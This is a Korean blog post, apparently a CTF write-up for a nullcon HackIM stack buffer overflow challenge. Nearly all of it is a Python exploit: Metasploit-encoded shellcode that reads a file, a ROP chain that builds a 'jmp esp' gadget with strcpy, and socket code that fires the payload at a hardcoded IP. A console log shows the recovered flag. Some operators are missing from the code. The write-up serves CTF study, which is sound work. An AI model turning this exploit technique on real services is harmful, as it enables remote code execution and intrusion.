고정 헤더 영역
상세 컨텐츠
본문
반응형
주제 : Simple stack based buffer overflow
binary :
srv2from socket import *
import struct
import time
p = lambda x : struct.pack(" ip = "192.168.0.109" ip = "23.23.190.205" port = 6776 """ /* * linux/x86/read_file - 97 bytes * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * VERBOSE=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, PATH=flag.txt, FD=4 */ """ shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60" "\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46" "\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc" "\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1" "\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58" "\x03\x39\x24\xd4\xbb\xb1\x38") shellcode = "\x90"*100 shellcode s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) recv = 0x08048720 send = 0x08048750 strcpy = 0x08048640 freespace = 0x0804b301 pr = 0x08048b54 nnjesp = 0x9090ffe4 raw_input("go? ") payload = ":" payload = "A" * (0xdc - len(payload)) payload = "BBBB" payload = "\x0a" payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace) payload = p(0x08048640) # 0xff payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace 1) payload = p(0x08048766) # 0xe4 payload = p(strcpy) payload = p(pr-1) # ppr payload = p(freespace 2) payload = p(0x08048e57) # 0x90 payload = p(strcpy) payload = p(pr-1) # pppr payload = p(freespace 3) payload = p(0x08048e57) # 0x90 payload = p(freespace) # jmp esp payload = shellcode # <-- esp!! s.recv(1024) print "[*] Sending Exploit.." time.sleep(1) s.send(payload "\n") print "[*] cat key :D" time.sleep(1) print s.recv(1024) raw_input("> ") """ C:\Users\Administrator\Desktop\nullcon>ex2.py go? [*] Sending Exploit.. [*] cat key :D 6ffcffda1c58f6dbe4dcd5b715de538c > C:\Users\Administrator\Desktop\nullcon> """
바이너리에는 간단한 buffer overflow 취약점이 존재한다.
aslr이 걸려있다는 가정하에 exploit 코드를 작성한다
Flag : 6ffcffda1c58f6dbe4dcd5b715de538c
반응형
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
| HackIM nullcon exploitation 400 write-up [exploit] (5) | 2014.01.27 |
|---|---|
| HackIM nullcon exploitation 300 write-up (4) | 2014.01.27 |
| URLDownloadToFile Shellcode Analysis (3) | 2014.01.23 |
| 2013 Plaid CTF ropsaurusrex Exploit (1) | 2013.11.12 |
| 2013 CodeGate YUT Vuln 300 WriteUp (0) | 2013.11.06 |
